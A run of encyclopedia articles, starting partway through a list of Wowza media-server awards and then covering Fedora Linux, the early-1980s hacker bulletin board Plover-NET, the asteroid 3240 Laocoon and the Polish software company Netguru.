Streaming Media Readers' Choice Awards in 2009. Wowza Media Server Pro won the Server Hardware/Software category in the Streaming Media Readers' Choice Awards in 2009. Wowza Media Server 2 won the Server Hardware/Software and Best Streaming Innovation of 2010 categories in the Streaming Media European Readers' Choice Awards in 2010. Wowza Media Server 3 won the Server Hardware/Software and the Best Streaming Innovation categories in the Streaming Media European Readers' Choice Awards in 2011. Wowza Media Server 3 won the Server Hardware/Software and the Best Streaming Innovation categories in the Streaming Media European Readers' Choice Awards in 2012. Additionally, the Wowza Media Server Transcoder Add-On won the Transcoding Solution category in the Streaming Media European Readers' Choice Awards in 2012. Wowza Media Server won the Server Hardware/Software category in the Streaming Media European Readers' Choice Awards in 2013. Wowza Media Server won the Media Server category in the Streaming Media Readers' Choice Awards in 2013. Wowza Streaming Engine won the Best Streaming Innovation category in the Streaming Media European Readers' Choice Awards in 2014. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2014. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2015. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2016. Wowza Streaming Engine won the Server Hardware/Software category in the Streaming Media European Readers' Choice Awards in 2016. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2017. Wowza Low Latency Streaming Platform won the Best Live Production/Streaming Product in the RedShark News awards at IBC 2017. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2018. Wowza Media Systems was listed as one of the 50 Companies That Matter Most in Online Video in 2019 by Streaming Media. Wowza CEO David Stubenvoll has been named a finalist in the EY Entrepreneur of the Year Award 2019. Wowza named Google Cloud Partner of the Year for Media 2019. See also MPEG-DASH References External links Media servers Streaming software
9951070
https://en.wikipedia.org/wiki/Fedora%20Linux
Fedora Linux
Fedora Linux is a Linux distribution developed by the Fedora Project which is sponsored primarily by Red Hat (an IBM subsidiary) with additional support and sponsors from other companies and organizations. Fedora contains software distributed under various free and open-source licenses and aims to be on the leading edge of open-source technologies. Fedora is the upstream source for Red Hat Enterprise Linux. Since the release of Fedora 30, five different editions are currently available: Workstation, focused on the personal computer, Server for servers, CoreOS, focused on cloud computing, Silverblue, focused on an immutable desktop specialized to container-based workflows and IoT, focused on IoT devices. A new version of Fedora Linux is released every six months, , Fedora Linux has an estimated 1.2 million users, including Linus Torvalds (), creator of the Linux kernel. Features Fedora has a reputation for focusing on innovation, integrating new technologies early on and working closely with upstream Linux communities. Making changes upstream instead of specifically for Fedora Linux ensures that the changes are available to all Linux distributions. Fedora Linux has a relatively short life cycle: each version is usually supported for at least 13 months, where version is supported only until 1 month after version +2 is released and with approximately 6 months between most versions. Fedora users can upgrade from version to version without reinstalling. The default desktop environment in Fedora Linux is GNOME and the default user interface is the GNOME Shell. Other desktop environments, including KDE Plasma, Xfce, LXQt, LXDE, MATE, Cinnamon, and i3 are available and can be installed. A live media drive can be created using Fedora Media Writer or the dd command. It allows users to try Fedora Linux without making changes to the hard disk. Package management Most Fedora Linux editions use the RPM package management system, using DNF as a tool to manage the RPM packages. DNF uses libsolv, an external dependency resolver. Flatpak is also included by default, and support for snap's can be added. Fedora Linux uses Delta RPM when updating installed packages to provide delta updates. A Delta RPM contains the difference between an old and new version of a package. This means that only the changes between the installed package and the new one are downloaded, reducing network traffic and bandwidth consumption. The Fedora CoreOS and Silverblue editions use rpm-ostree, a hybrid transactional image/package system to manage the host. Traditional DNF (or other systems) should be used in containers. Security Fedora Linux uses Security-Enhanced Linux by default, which implements a variety of security policies, including mandatory access controls, which Fedora adopted early on. Fedora provides a hardening wrapper, and does hardening for all of its packages by using compiler features such as position-independent executable (PIE). Software Fedora Linux comes preinstalled with a wide range of software such as LibreOffice and Firefox. Additional software is available from the software repositories and can be installed using the DNF package manager or GNOME Software. Additionally, extra repositories can be added to the system, so that software not available in Fedora Linux can be installed easily. Software that is not available via official Fedora repositories, either because it doesn't meet Fedora's definition of free software or because its distribution may violate US law, can be installed using third-party repositories. Popular third-party repositories include RPM Fusion free and non-free repositories. Fedora also provides users with an easy-to-use build system for creating their own repositories called Copr. Since the release of Fedora 25, the operating system defaults to the Wayland display server protocol, which replaced the X Window System. System installer Fedora Linux uses Anaconda as the system installer. Editions Beginning with Fedora version 30, it is available in five editions, three editions are primary and two editions are secondary as of version 35. Primary Workstation It targets users who want a reliable, user-friendly, and powerful operating system for their laptop or desktop computer. It comes with GNOME by default but other desktops can be installed or can be directly installed as Spins. Server Its target usage is for servers. It includes the latest data center technologies. This edition doesn't come with a desktop environment, but one can be installed. From Fedora 28, Server Edition will deliver Fedora Modularity, adding support for alternative update streams for popular software such as Node.js and Go. IoT Images of Fedora Linux tailored to running on Internet of Things devices. Secondary CoreOS The successor of Fedora Atomic Host (Project Atomic) and Container Linux after Fedora 29, it provides a minimal image of Fedora Linux which includes just the bare essentials. It is meant for deployment in cloud computing. It provides Fedora CoreOS images which are optimized minimal images for deploying containers. CoreOS replaced the established Container Linux when it was merged with Project Atomic after its acquisition by Red Hat in January 2018. Silverblue An immutable desktop operating system. Every Silverblue installation is identical to every other installation of the same version, and it never changes as it is used. The immutable design is intended to make the operating system more stable, less prone to bugs, and easier to test and develop, and an excellent platform for containerized applications as well as container-based software development. Applications and containers are kept separate from the host system. OS updates are fast and there is no installation stage. With Silverblue, it is also possible to roll back to the previous version of the operating system, if something goes wrong. Fedora Silverblue was previously known as Fedora Atomic Workstation. The descriptive name for this product is ​image-mode container-based Fedora Workstation based on rpm-ostree, which is clear but unsuitable for branding. Therefore, it was named Silverblue. The long-term goal for this effort is to transform Fedora Workstation into an image-based system where applications are separate from the OS, and updates are atomic. Red Hat engineers have built most of the pieces for this new desktop over the last few years: OSTree, flatpak, flathub, rpm-ostree, and gnome-software. The ultimate goal of this effort always was to create an image-based variant of the Workstation that is at feature-parity and better suited for certain use cases than the traditional variant. Until the end of 2017, the Silverblue team slowly completed necessary pieces for the vision of an immutable image-based OS with independent applications: Wayland, flatpak, and rpm-ostree support in GNOME Software, etc. During the same time, Project Atomic has added new features like package layering to rpm-ostree and added rpm-ostree support to anaconda. Labs Similar to Debian blends, the Fedora Project also distributes custom variations of Fedora Linux called Fedora Labs. These are built with specific sets of software packages, targeting specific interests such as gaming, security, design, robotics, and scientific computing (that includes SciPy, Octave, Kile, Xfig and Inkscape). The Fedora AOS (Appliance Operating System) was a specialized spin of Fedora Linux with reduced memory footprint for use in software appliances. Appliances are pre-installed, pre-configured, system images. This spin was intended to make it easier for anyone (developers, independent software vendors (ISV), original equipment manufacturers (OEM), etc.) to create and deploy virtual appliances. Spins and Remixes The Fedora project officially distributes different variations called "Fedora Spins" which are Fedora Linux with different desktop environments (GNOME is the default desktop environment). The current official spins, as of Fedora 34, are KDE, Xfce, LXQt, MATE-Compiz, Cinnamon, LXDE, SOAS, and i3. In addition to Spins, which are official variants of the Fedora system, the project allows unofficial variants to use the term "Fedora Remix" without asking for further permission, although a different logo (provided) is required. Architectures x86-64, ARM AArch64 and ARM-hfp are the primary architectures supported by Fedora. As of release 35, Fedora also supports IBM Power64le, IBM Z ("s390x"), MIPS-64el, MIPS-el and RISC-V as secondary architectures. Fedora 28 was the last release that supported ppc64 and users are advised to move to the little endian ppc64le variant. Fedora 36 will be the last release with support for ARM-hfp. Alternatives The Fedora Project also distributes several other versions with less use cases than mentioned above, like network installers and minimal installation images. They are intended for special cases or expert users that want to have custom installations or configuring Fedora from scratch. In addition, all acceptable licenses for Fedora Linux (including copyright, trademark, and patent licenses) must be applicable not only to Red Hat or Fedora, but also to all recipients downstream. This means that any "Fedora-only" licenses, or licenses with specific terms that Red Hat or Fedora meets but that other recipients would not are not acceptable (and almost certainly non-free, as a result). History The name of Fedora derives from Fedora Linux, a volunteer project that provided extra software for the Red Hat Linux distribution, and from the characteristic fedora hat used in Red Hat's "Shadowman" logo. Warren Togami began Fedora Linux in 2002 as an undergraduate project at the University of Hawaii, intended to provide a single repository for well-tested third-party software packages so that non-Red Hat software would be easier to find, develop, and use. The key difference between Fedora Linux and Red Hat Linux was that Fedora's repository development would be collaborative with the global volunteer community. Fedora Linux was eventually absorbed into the Fedora Project, carrying with it this collaborative approach. Fedora Linux was launched in 2003, when Red Hat Linux was discontinued. Red Hat Enterprise Linux was to be Red Hat's only officially supported Linux distribution, while Fedora was to be a community distribution. Red Hat Enterprise Linux branches its releases from versions of Fedora. Before Fedora 7, Fedora was called Fedora Core after the name of one of the two main software repositories - Core and Extras. Fedora Core contained all the base packages that were required by the operating system, as well as other packages that were distributed along with the installation CD/DVDs, and was maintained only by Red Hat developers. Fedora Extras, the secondary repository that had been included since Fedora Core 3, was community-maintained and not distributed along with the installation CD/DVDs. Upon the release of Fedora 7, the distinction between Fedora Core and Fedora Extras was eliminated. Since the release of Fedora 21, as an effort to modularize the Fedora distribution and make development more agile, three different versions are available: Workstation, focused on the personal computer, Server and Atomic for servers, Atomic being the version meant for cloud computing. Fedora is a trademark of Red Hat, Inc. Red Hat's application for trademark status for the name "Fedora" was disputed by Cornell University and the University of Virginia Library, creators of the unrelated Fedora Commons digital repository management software. The issue was resolved and the parties settled on a co-existence agreement that stated that the Cornell-UVA project could use the name when clearly associated with open source software for digital object repository systems and that Red Hat could use the name when it was clearly associated with open source computer operating systems. In April 2020, project leader Matthew Miller announced that Fedora Workstation would be shipping on select new ThinkPad laptops, thanks to a new partnership with Lenovo. Development and community Development of the operating system and supporting programs is headed by the Fedora Project, which is composed of a community of developers and volunteers, and also Red Hat employees. The Council is the top-level community leadership and governance body. Other bodies include the Fedora Engineering Steering Committee, responsible for the technical decisions behind the development of Fedora, and Fedora Mindshare Committee which coordinates outreach and non-technical activities, including representation of Fedora Worldwide e.g.: Ambassadors Program, CommOps team and Marketing, Design and Websites Team. Releases Fedora has a relatively short life cycle: version is supported only until 1 month after version +2 is released and with approximately 6 months between most versions, meaning a version of Fedora is usually supported for at least 13 months, possibly longer. Fedora users can upgrade from version to version without reinstalling. The current release is Fedora 35, which was released on 2 November 2021. Rawhide Rawhide is the development tree for Fedora. This is a copy of a complete Fedora distribution where new software is added and tested, before inclusion in a later stable release. As such, Rawhide is often more feature rich than the current stable release. In many cases, the software is made of CVS, Subversion or Git source code snapshots which are often actively developed by programmers. Although Rawhide is targeted at advanced users, testers, and package maintainers, it is capable of being a primary operating system. Users interested in the Rawhide branch often update on a daily basis and help troubleshoot problems. Rawhide users do not have to upgrade between different versions as it follows a rolling release update model. See also Fedora Project Fedora Media Writer Rocky Linux Red Hat Enterprise Linux Anaconda, the system installer used by Fedora ABRT References External links Fedora Magazine ARM Linux distributions Fedora Project IA-32 Linux distributions LXQt Power ISA Linux distributions PowerPC Linux distributions RPM-based Linux distributions X86-64 Linux distributions Linux distributions
43070215
https://en.wikipedia.org/wiki/Plover-NET
Plover-NET
Plover-NET, often misspelled Plovernet, was a popular bulletin board system in the early 1980s. Hosted in New York state and originally owned and operated by a teenage hacker who called himself Quasi-Moto, whom was a member of the short lived yet famed Fargo 4A phreak group. The popular bulletin board system attracted a large group of hackers, telephone phreaks, engineers, computer programmers, and other technophiles, at one point reaching over 600 users until LDX, a long distance phone company, began blocking all calls to its number (516-935-2481). Naming and creation The name Plover-NET came from a conversation between Quasi Moto, and Greg Schaefer. The topic of computer games came up. One of them, the 'Extended Adventure' game which was based on the 'Original Adventure' fantasy computer game was mentioned. This game was available on Compuserve and during game play the magic word PLOVER had to be used. Past sysop of Plover-NET included Eric Corley, under the pseudonym Emmanuel Goldstein, and Lex Luthor, the founder of the notorious hacker group Legion of Doom. Quasi-Moto personally recounted the creation of Plover-NET, I met Lex in person while we lived in Florida during the Fall of 1983 after corresponding via email on local phreak boards. I was due to move to Long Island, New York (516 Area Code) soon after and asked him about starting up a phreak BBS. He agreed to help and flew up during his Christmas break from school in late December 1983. We worked feverishly for a couple of days to learn the GBBS Bulletin Board software which was to run on my Apple with a 300 baud Hayes micoSLOWdom %micromodem% and make modifications as necessary. The system accepted its first phone call from Lex in the first week of January 1984 and it became chronically busy soon after. Legion of Doom Lex Luthor, under the age of 18 at the time, was a COSMOS (Central System for Mainframe Operations) expert, when he operated Plover-NET. At the time there were a few hacking groups in existence, such as Fargo-4A and Knights of Shadow. Lex was admitted into KOS in early 1984, but after making a few suggestions about new members, and having them rejected, Lex decided to put up an invitation only BBS and to start forming a new group. Starting around May 1984 he began using is position on Plover-NET to contact people he had seen on Plover-NET and people he knew personally who possessed the kind of superior knowledge that the group he envisioned should have. He was never considered to be the "mastermind of the Legion of Doom", more the cheerleader and recruiting officer. 2600 Luthor met 2600 Magazine editor, Emmanuel Goldstein on the Pirates Cove, another 516 pirate/phreak BBS. He invited Goldstein onto Plover and it wasn't long before it became an 'official' 2600 bbs of sorts. When a user logged off the system, a plug for 2600 was displayed with their subscription prices and addresses. Operations The Board initially ran on three Apple disk drives with 143 K byte capacity. After a few months of operation, New York hacker Paul Muad'Dib appeared at a TAP meeting being held at "Eddies" in Greenwich Village with a RANA Elite III disk drive in hand. The RANA Elite III had a capacity of about 600 KB which put the total storage capacity of the BBS to just over one Megabyte, fairly large for a phreak board in those days. They gladly accepted the donation but did not ask how he obtained the disk drive. The RANA was later passed on to Lex which he used to house his extensive collection of phreak philes that were available to Legion of Doom BBS users. The location of the overworked RANA is currently unknown although Lex believes he sent it back to Muad'Dib around 1986. In early 1985 Plover-NET officially closed permanently after Quasi-Moto moved back to Florida and was unable to gain traction in re-establishing the bulletin board when he put it back up after moving. References Bulletin board systems Groupware Hacker groups Internet culture Internet forums Online chat Phreaking Pre–World Wide Web online services Social information processing Underground computer groups
16465557
https://en.wikipedia.org/wiki/3240%20Laocoon
3240 Laocoon
3240 Laocoon is a carbonaceous Jupiter trojan from the Trojan camp, approximately in diameter. It was discovered on 7 November 1978, by American astronomers Eleanor Helin and Schelte Bus at Palomar Observatory in California. The D-type asteroid belongs to the 100 largest Jupiter trojans and has a rotation period of 11.3 hours. It was named after Laocoön from Greek mythology. Classification and orbit Laocoon resides in the Trojan camp of Jupiter's Lagrangian point, which lies 60° behind the gas giant's orbit. It is also a non-family asteroid of the Jovian background population. It orbits the Sun at a distance of 4.6–5.9 AU once every 11 years and 12 months (4,375 days; semi-major axis of 5.23 AU). Its orbit has an eccentricity of 0.13 and an inclination of 2° with respect to the ecliptic. The asteroid was first observed as at Crimea–Nauchnij in September 1976, extending the body's observation arc by 2 years prior to its official discovery at Palomar. Physical characteristics Laocoon has been characterized as a D-type asteroid by Pan-STARRS survey and in the SDSS-based taxonomy. It has a V–I color index of 0.88. Lightcurve In April 1996, Laocoon was observed by Italian astronomer Stefano Mottola using the now decommissioned Bochum 0.61-metre Telescope at ESO's La Silla Observatory in Chile. The lightcurve gave a rotation period of hours with a brightness variation of in magnitude (). Diameter and albedo According to the NEOWISE mission of NASA's Wide-field Infrared Survey Explorer, the Jovian asteroid measures 51.7 kilometers in diameter and its surface has an albedo of 0.060, while the Collaborative Asteroid Lightcurve Link assumes a standard albedo for a carbonaceous asteroid of 0.057 and calculates a diameter of 50.8 kilometers with an absolute magnitude of 10.2. Naming This minor planet was named after the Troyan priest Laocoön from Greek mythology. He and both his sons were killed by serpents sent by the gods because he tried to expose the Greek's deception of the Trojan Horse. The official naming citation was published by the Minor Planet Center on 7 September 1987 (). See also Laocoön (El Greco) References External links Asteroid Lightcurve Database (LCDB), query form (info ) Dictionary of Minor Planet Names, Google books Discovery Circumstances: Numbered Minor Planets (1)-(5000) – Minor Planet Center Asteroid 3240 Laocoon at the Small Bodies Data Ferret 003240 Discoveries by Eleanor F. Helin Discoveries by Schelte J. Bus Minor planets named from Greek mythology Named minor planets 19781107
57918197
https://en.wikipedia.org/wiki/Netguru
Netguru
Netguru is a Polish software development and software consultancy company founded in 2008. Headquartered in Poznań, Poland, it's a globally operating business, with local offices including Warsaw, Kraków, Wrocław, Gdańsk and Białystok. It provides software design and product design, both for early-stage startups and corporations. Since 2013, Netguru declares yearly growth of nearly 100 percent. It landed three times in Deloitte's Technology Fast 50 Central Europe ranking, and twice on the "FT 1000," the Financial Times''' list of fastest-growing companies in Europe. In 2016, Netguru reached PLN 28.2M () of income, and PLN 5.1M () net profit, closed 2017 with turnover of PLN 40M (), and in 2018, doubled it at around PLN 80M (). History Founding years Netguru was founded in Poznań, Poland by Wiktor Schmidt (an automation and robotics student at the Poznań University of Technology), Jakub Filipowski (a web designer and philosophy student at the Adam Mickiewicz University in Poznań), and Adam Zygadlewicz (an e-commerce entrepreneur), who met thanks to popularity of Filipowski's blog about the internet Yashke.com. The three opened the first coworking space in Poland in a rented office in central Poznań, where they developed websites together. Since 2007, through their own foundation Fundacja Polak 2.0, they also organized first BarCamp community meetings for innovation enthusiasts in Poland, along with further events: the International Startup Fair Democamp, the ShopCamp workshops, and the Hackfest. On May 8, 2008, Schmidt, Filipowski and Zygadlewicz registered their software development business, as Netguru. Their first contracts were a Web 2.0 travel portal Kolumber.pl, for the media publishing corp Agora, and an employer relations portal for Bank Zachodni WBK. Netguru developed also their own microblogging social platform, a charity service, and a recruitment support tool HumanWay, awarded at startup competitions Seedcamp Warsaw and Aulery. Beside functional development and community management, the company was specializing in consulting and market analysis. Since September 2007, the Netguru has been documenting its portfolio and web development industry on an official blog. In September 2010, Zygadlewicz announced a first coworking space for startups and freelance developers in Warsaw. In July 2011, Filipowski, along with entrepreneurs Borys Musielak and Anna Walkowska, moved their businesses together into a mansion in Żoliborz, establishing the Reaktor, which evolved into the first networking hub in Poland, and the venue for the Warsaw startup scene. Filipowski and Schmidt contributed the famed article on the internet website Antyweb, "There Will Be No More 'Polish Equivalents'", about web services Allegro, Gadu-Gadu, and Nasza Klasa, as local copycats of EBay, ICQ, and Classmates.com, respectively. The article’s punch line: "Let's get to work, get rid of complexes, and create models with a global or at least pan-European potential". Focus on web development From 2012, Netguru has been developing applications and platforms solely in Ruby on Rails. In 2013, HumanWay was acquired by the recruitment house Grupa Pracuj. Zygadlewicz exited Netguru, while Schmidt and Filipowski focused entirely on web applications for British, American, and German startups. In 2014, Netguru became a partner for Spree Commerce. At the time, its portfolio included a market research provider GlobalWebIndex, and a language-learning platform Babbel. In 2015, Netguru implemented a mobile app for a media marketplace Transterra Media, which allows news outlets to manage and publish pre-produced videos. Netguru formed a team of product designers working with IKEA and Volkswagen. The team also created a personal assistant system for a domestic robot. International expansion In 2014, Netguru moved onto Israeli and the Middle East markets, to support entrepreneurs from across the UAE & the MENA regions. In 2015, the company joined the London fintech community. In 2016, it created a mobile bicycle-sharing platform for Citi Bike. And in 2017, it developed Helpr which connects British social care workers with care recipients. In 2016, Netguru recorded an increase in revenues and growth, with no investment support – over PLN 30M (60% year-over-year growth); in 2017, about PLN 40M (), and in 2018, around PLN 80M (). In 2013, the company had about 50 employees; in 2016, over 300, and in 2018, 500 employees around Poland. Between 2016–2018, Netguru reached an EBITDA margin of 15%. Since 2017, Netguru has been developing its business consulting expertise, prototyping products, and building marketing strategies. It has helped large organisations to adopt business agility practices, and innovations with software robots. On June 3, 2019, Netguru's chief operating officer Marek Talarczyk was named the new CEO, with Schmidt including the position of executive chairman, and Małgorzata Madalińska-Piętka joining the board as chief financial officer. Main activities Netguru specializes in developing front-end and back-end web applications, mobile applications, product design, and consulting. According to its tagline, the company "builds digital products that let people do things differently". Its portfolio includes SaaS marketplaces, e-commerce, big data systems, trading systems, and social networks. Machine Learning In May 2018, during a Microsoft hackathon in Prague, Netguru (along with MicroscopeIT) launched a deep-learning image-recognition application that solved segmentation with neural networks. Netguru also partnered with the domestic robotic manufacturer Temi, on building the robotics middleware for the consumer assistant robot, using natural language processing. Other initiatives In 2010, Netguru developers created an online platform for the foundation Apps for Good, that allows cooperation of teachers, students and experts in schools in the United States, Spain, Portugal, and Poland. Since 2017, Netguru has conducted workshops based on design-thinking sprints developed by Google, which are aimed to answer critical business questions through design, prototyping, and testing ideas with customers, to reduce the risk of bringing a new product, service, or feature to the market. Mergers and acquisitions In December 2017, in its first transaction, Netguru took over a team of developers and designers from the Internet-of-things company Vorm. In May 2018, Netguru merged with the IT support and DevOps provider ITTX, and in July 2018, it acquired the software house Bitcraft. Original publications In 2016, Netguru compiled Project Management Tactics for Pros, an e-book with guidance on IT projects, including preparation and budget. In 2018, Netguru published Design Process for Pros, a live e-book actively curated by the designers community, with a set of best practices in web design. Another guide, From Concept to Completion (2018), is an Agile software consulting walk-through, for understanding software development processes and tried-and-true techniques. Netguru collaborated with a survey-building service Typeform on State of Stack (2016), a report of the latest trends in web development, based on a developer community study. In 2016, Netguru published the London Startup Guide, a guide on tech business events, meetups, business incubators and communities of London. Educational events Between 2017–2018, Netguru organized summer workshops Netguru Code College for coding enthusiasts walking through web application building processes with Ruby on Rails professionals In 2018, Netguru hosted the Disruption Forum in Berlin, a meeting of the fintech community which turned into a regular fintech startup event. Between 2013–2015, Netguru have coached Ruby on Rails around Poland, at free practical workshops aimed at PHP, Java, and .NET developers. Since 2015, Netguru have hosted weekend hackathons in its Poznan headquarters, and regular Ruby on Rails student workshops at the Katowice Institute of Information Technologies. Since 2015, Netguru managers have organized regular free project management workshops. Since 2017, Netguru has hosted regular designers events Dribbble Meetup, along with Swift Poznan and PTAQ meetings. Netguru has also cooperated with universities, involved in academic life, and during monthly webinars for technology enthusiasts. Trademark registration dispute In 2014, the company filed an application to the European Union Intellectual Property Office to register EU trade mark "Netguru" in several classes related to computer services. However, it was rejected due to the lack of distinctiveness of the name. The company appealed to the General Court of the European Union, which dismissed the complaint, considering that the combination of the words "net" and "guru" appeared as advertising, nor it doesn't allow the target public to perceive the sign as an indication of the commercial origin of the goods and services in question. Awards and accolades Netguru is a three-time winner of the Fast 50 Central Europe competition where the accounting network Deloitte recognizes and profiles the 50 most dynamic technology companies in the region, based on the revenue growth over past five years. Netguru was ranked 5 in 2014, and 2015, and received the third award in 2017. Netguru landed twice on the "FT 1000", the list of Europe's fastest-growing companies in Europe according to Financial Times, in 2017 (ranked 188), and in 2018 (ranked 466). In 2016, the company was introduced by Forbes into the list of "Diamonds", the list of the most promising companies in Poland. In 2014, Netguru was named Top Ruby on Rails Developers, by the American market analysis firm Clutch, in the report on Market Leaders, based on in-depth interviews with clients. Then again in August 2017, Clutch named Netguru as one of the best outsourcing companies in the industry. In 2018, Schmidt and Filipowski were among Polish finalists of the Ernst & Young Entrepreneur of the Year Award competition. In 2011, Netguru wins the Aulery award, as one of the best tech companies with global potential. While Schmidt and Filipowski have been both placed twice on Brief magazine's list of The Most Creative in Business: in 2014, ranked 38, and in 2016, ranked 13. In November 2017, Netguru, joined by the software house CashCape, received two awards in the Bankathon Berlin'', for an application explaining the impact of the Payments Services Directive and other regulations. References External links Polish companies established in 2008 Companies based in Poznań Information technology companies of Poland Polish brands Software companies of Poland Software companies established in 2008